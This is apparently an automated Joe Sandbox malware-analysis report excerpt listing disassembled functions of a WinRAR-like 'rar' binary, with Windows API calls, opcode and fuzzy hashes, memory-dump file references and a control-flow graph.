                                                                                                                                                                                                                                • Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                                                                                                                                                                                                • Instruction ID: 565280187a245d7692cc6fbdfa612b83b417dfc8b05aded54c0d159ed034c0ba
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9C2D672D0C38385FB649F2881461BE66A1AF01784F9590B5CAAEC72C5FE6FE54ED310
                                                                                                                                                                                                                                Function 00007FF6FAA21884 Relevance: 24.1, APIs: 5, Strings: 8, Instructions: 1374COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
                                                                                                                                                                                                                                • API String ID: 0-1660254149
                                                                                                                                                                                                                                • Opcode ID: 7713fc30a0949132ff6f2d98c66cd83d2205d8834f017a1a320264aa9ffc92fa
                                                                                                                                                                                                                                • Instruction ID: 9649c9ddc0d53c6be0295bdaee2b227859a4b0766a97e8bc5a634bb5ad39de74
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7713fc30a0949132ff6f2d98c66cd83d2205d8834f017a1a320264aa9ffc92fa
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9BE29136A09AC285EB20DF26D8401FD27A1FB85788F454075DA6D87BDAEF39D56EC300
                                                                                                                                                                                                                                Function 00007FF6FAA648CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA64AE0: FreeLibrary.KERNEL32(?,?,00000000,00007FF6FAA3CC90), ref: 00007FF6FAA64AF5
                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,?,00007FF6FAA57E7D), ref: 00007FF6FAA6492E
                                                                                                                                                                                                                                • GetVersionExW.KERNEL32(?,?,?,00007FF6FAA57E7D), ref: 00007FF6FAA6496A
                                                                                                                                                                                                                                • LoadLibraryExW.KERNELBASE(?,?,?,00007FF6FAA57E7D), ref: 00007FF6FAA64993
                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(?,?,?,00007FF6FAA57E7D), ref: 00007FF6FAA6499F
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Library$Load$FileFreeModuleNameVersion
                                                                                                                                                                                                                                • String ID: rarlng.dll
                                                                                                                                                                                                                                • API String ID: 2520153904-1675521814
                                                                                                                                                                                                                                • Opcode ID: 49b096ca26b206715f71fd28137422a8c8958387befaadcb30f15fb4690b8ba1
                                                                                                                                                                                                                                • Instruction ID: c9135ff9c91f70d2a6a0ffcc187f87a0c810019fd02d268026e5f47791ad7969
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49b096ca26b206715f71fd28137422a8c8958387befaadcb30f15fb4690b8ba1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02319032628A4296FB649F25E9402E92360FB45784F8041B5EA5D837D8FF3DD58FCB00
                                                                                                                                                                                                                                Function 00007FF6FAA446EC Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF6FAA44620,?,00000000,?,00007FF6FAA67A8C), ref: 00007FF6FAA44736
                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF6FAA44620,?,00000000,?,00007FF6FAA67A8C), ref: 00007FF6FAA4476B
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,?,?,00007FF6FAA44620,?,00000000,?,00007FF6FAA67A8C), ref: 00007FF6FAA4477A
                                                                                                                                                                                                                                • FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF6FAA44620,?,00000000,?,00007FF6FAA67A8C), ref: 00007FF6FAA447A4
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,?,?,00007FF6FAA44620,?,00000000,?,00007FF6FAA67A8C), ref: 00007FF6FAA447B2
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileFind$ErrorFirstLast$Next
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 869497890-0
                                                                                                                                                                                                                                • Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                                                                                • Instruction ID: b421f5682a7159234303d82b5f55ba90d8c174071233ad4dd75be2aaece21208
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9419032A08A8197EB649B25E5402E963A0FB497B4F404371FE7D837D9EF6CE55E8700
                                                                                                                                                                                                                                Function 00007FF6FAA3901C Relevance: 4.5, APIs: 3, Instructions: 35encryptionCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1815803762-0
                                                                                                                                                                                                                                • Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                                                                                • Instruction ID: 31d4929faeaff05e12b9893b71ea201c66a1c4fb34fb58599545784934a451d8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17016D2AB0865082EB408B16A9553296761EBC5FD0F188071DE9E83BA8DF7ED95A8700
                                                                                                                                                                                                                                Function 00007FF6FAA2B540 Relevance: 2.0, APIs: 1, Instructions: 490COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Char
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 751630497-0
                                                                                                                                                                                                                                • Opcode ID: baabab1820374ba2820f1ea48004dae6935bb02fa1d5f0f7c129e9593b88d397
                                                                                                                                                                                                                                • Instruction ID: bc3c52c0802db4a5a76aacf5aef60d24de070fd69328920a0c5aa4f26ff08921
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: baabab1820374ba2820f1ea48004dae6935bb02fa1d5f0f7c129e9593b88d397
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB22C132A086829AE714DF31D4411FEBBE0FB44748F484076DA9D872D9EE7CE95ACB40
                                                                                                                                                                                                                                Function 00007FF6FAA4AE10 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 14cfdc3b074ce30e7abac2d939f6e9d98027489a61441e2478d82fe2504e34b6
                                                                                                                                                                                                                                • Instruction ID: 5f6c7d3d09310c780e17af044cd92b1eb4f197bbe2c99a83477e626fcecbefa6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14cfdc3b074ce30e7abac2d939f6e9d98027489a61441e2478d82fe2504e34b6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DF71CF32B15A8586D744DF29E4052ED3391FB88B98F044139DF6DCB3D9EF79A0468790
                                                                                                                                                                                                                                Function 00007FF6FAA63EA8 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 491COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 635 7ff6faa63ea8-7ff6faa63f03 call 7ff6faa7a5a0 call 7ff6faa7c8a0 640 7ff6faa63f05-7ff6faa63f3e GetModuleFileNameW call 7ff6faa54e14 call 7ff6faa6a9c0 635->640 641 7ff6faa63f40-7ff6faa63f50 call 7ff6faa6a9e8 635->641 645 7ff6faa63f55-7ff6faa63f79 call 7ff6faa41874 call 7ff6faa41e80 640->645 641->645 652 7ff6faa64692-7ff6faa646c5 call 7ff6faa418ac call 7ff6faa7a610 645->652 653 7ff6faa63f7f-7ff6faa63f89 645->653 654 7ff6faa63f8b-7ff6faa63fac call 7ff6faa611c0 * 2 653->654 655 7ff6faa63fae-7ff6faa63feb call 7ff6faa7ec70 * 2 653->655 654->655 668 7ff6faa63fef-7ff6faa63ff3 655->668 669 7ff6faa63ff9-7ff6faa6402d call 7ff6faa42440 call 7ff6faa42150 668->669 670 7ff6faa640f2-7ff6faa64112 call 7ff6faa422e0 call 7ff6faa7eb90 668->670 679 7ff6faa640bc-7ff6faa640e2 call 7ff6faa422e0 669->679 680 7ff6faa64033 669->680 670->652 681 7ff6faa64118-7ff6faa64131 call 7ff6faa42150 670->681 679->668 692 7ff6faa640e8-7ff6faa640ec 679->692 682 7ff6faa6403a-7ff6faa6403e 680->682 689 7ff6faa64138-7ff6faa6414b call 7ff6faa7eb90 681->689 690 7ff6faa64133-7ff6faa64136 681->690 686 7ff6faa64064-7ff6faa64069 682->686 687 7ff6faa64040-7ff6faa64044 682->687 693 7ff6faa6406b-7ff6faa64070 686->693 694 7ff6faa64097-7ff6faa6409f 686->694 687->686 691 7ff6faa64046-7ff6faa6405e call 7ff6faa82290 687->691 689->652 706 7ff6faa64151-7ff6faa6416c call 7ff6faa6d54c call 7ff6faa7eb88 689->706 697 7ff6faa6416f-7ff6faa641b1 call 7ff6faa6a900 call 7ff6faa7eb90 690->697 707 7ff6faa640a3-7ff6faa640a7 691->707 708 7ff6faa64060 691->708 692->652 692->670 693->694 700 7ff6faa64072-7ff6faa64078 693->700 695 7ff6faa640b7 694->695 696 7ff6faa640a1 694->696 695->679 696->682 718 7ff6faa641b3-7ff6faa641bb call 7ff6faa7eb88 697->718 719 7ff6faa641c0-7ff6faa641d5 697->719 704 7ff6faa6407a-7ff6faa64091 call 7ff6faa81700 700->704 705 7ff6faa64093 700->705 704->705 716 7ff6faa640a9-7ff6faa640b5 704->716 705->694 706->697 707->695 708->686 716->679 718->652 721 7ff6faa641db 719->721 722 7ff6faa645f0-7ff6faa64624 call 7ff6faa63884 call 7ff6faa7eb88 * 2 719->722 725 7ff6faa641e1-7ff6faa641ee 721->725 755 7ff6faa6464a-7ff6faa64691 call 7ff6faa7ec70 * 2 722->755 756 7ff6faa64626-7ff6faa64648 call 7ff6faa611c0 * 2 722->756 727 7ff6faa64508-7ff6faa64513 725->727 728 7ff6faa641f4-7ff6faa641fa 725->728 727->722 731 7ff6faa64519-7ff6faa64523 727->731 732 7ff6faa641fc-7ff6faa64202 728->732 733 7ff6faa64208-7ff6faa6420e 728->733 735 7ff6faa64585-7ff6faa64589 731->735 736 7ff6faa64525-7ff6faa6452b 731->736 732->727 732->733 737 7ff6faa64214-7ff6faa6425c 733->737 738 7ff6faa643d0-7ff6faa643e0 call 7ff6faa6a580 733->738 739 7ff6faa6458b-7ff6faa6458f 735->739 740 7ff6faa645a3-7ff6faa645d4 call 7ff6faa63884 735->740 742 7ff6faa645db-7ff6faa645de 736->742 743 7ff6faa64531-7ff6faa64539 736->743 744 7ff6faa64261-7ff6faa64264 737->744 761 7ff6faa643e6-7ff6faa64414 call 7ff6faa6a9e8 call 7ff6faa8172c 738->761 762 7ff6faa644f0-7ff6faa64503 738->762 739->740 746 7ff6faa64591-7ff6faa64597 739->746 740->742 742->722 751 7ff6faa645e0-7ff6faa645e5 742->751 749 7ff6faa6453b-7ff6faa6453e 743->749 750 7ff6faa64573-7ff6faa6457a 743->750 752 7ff6faa64268-7ff6faa64270 744->752 746->742 754 7ff6faa64599-7ff6faa645a1 746->754 758 7ff6faa6456a-7ff6faa64571 749->758 759 7ff6faa64540-7ff6faa64543 749->759 763 7ff6faa6457e-7ff6faa64583 750->763 751->725 752->752 760 7ff6faa64272-7ff6faa64288 call 7ff6faa81700 752->760 754->742 755->652 756->755 758->763 765 7ff6faa64545-7ff6faa64548 759->765 766 7ff6faa64561-7ff6faa64568 759->766 779 7ff6faa6428a-7ff6faa64295 760->779 780 7ff6faa642a3 760->780 761->762 787 7ff6faa6441a-7ff6faa644a9 call 7ff6faa6d840 call 7ff6faa6a900 call 7ff6faa6a8c4 call 7ff6faa6a900 call 7ff6faa815fc 761->787 762->727 763->742 771 7ff6faa6454a-7ff6faa6454d 765->771 772 7ff6faa64558-7ff6faa6455f 765->772 766->763 771->746 777 7ff6faa6454f-7ff6faa64556 771->777 772->763 777->763 779->780 786 7ff6faa64297-7ff6faa642a1 779->786 783 7ff6faa642a7-7ff6faa642be 780->783 783->744 788 7ff6faa642c0-7ff6faa642c2 783->788 786->783 823 7ff6faa644ab-7ff6faa644bb 787->823 824 7ff6faa644bf-7ff6faa644cf 787->824 790 7ff6faa642e6 788->790 791 7ff6faa642c4-7ff6faa642d6 call 7ff6faa6a900 788->791 790->738 794 7ff6faa642ec 790->794 796 7ff6faa642db-7ff6faa642e1 791->796 797 7ff6faa642f1-7ff6faa642f7 794->797 799 7ff6faa645d6 796->799 800 7ff6faa642f9-7ff6faa642fe 797->800 801 7ff6faa64300-7ff6faa64303 797->801 799->742 800->801 803 7ff6faa64305-7ff6faa64314 800->803 801->797 805 7ff6faa6433d-7ff6faa64347 803->805 806 7ff6faa64316-7ff6faa64320 803->806 807 7ff6faa645ea-7ff6faa645ef call 7ff6faa7a774 805->807 808 7ff6faa6434d-7ff6faa64378 call 7ff6faa6d840 805->808 810 7ff6faa64323-7ff6faa64327 806->810 807->722 818 7ff6faa6437a-7ff6faa64399 call 7ff6faa81764 808->818 819 7ff6faa6439e-7ff6faa643cb call 7ff6faa6470c 808->819 810->805 814 7ff6faa64329-7ff6faa6433b 810->814 814->805 814->810 818->796 819->796 823->824 827 7ff6faa644d2-7ff6faa644d8 824->827 828 7ff6faa644eb-7ff6faa644ee 827->828 829 7ff6faa644da-7ff6faa644e5 827->829 828->827 829->799 829->828
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileModuleNamesnprintfwcschr
                                                                                                                                                                                                                                • String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
                                                                                                                                                                                                                                • API String ID: 602362809-1645646101
                                                                                                                                                                                                                                • Opcode ID: 13040d61f0e7da43208126d1082a5dded3eea02b21a4f98514b48b8c6faaa874
                                                                                                                                                                                                                                • Instruction ID: 9906367a6f9fc15994f231b8bf9879114f345c68756bf418e98d165d7d60c426
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 13040d61f0e7da43208126d1082a5dded3eea02b21a4f98514b48b8c6faaa874
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E922E432A1868286EB20DB19D5402F92761FF46784F805175EA6EC77D9FF3CE94ACB40
                                                                                                                                                                                                                                Function 00007FF6FAA34FD0 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 293COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
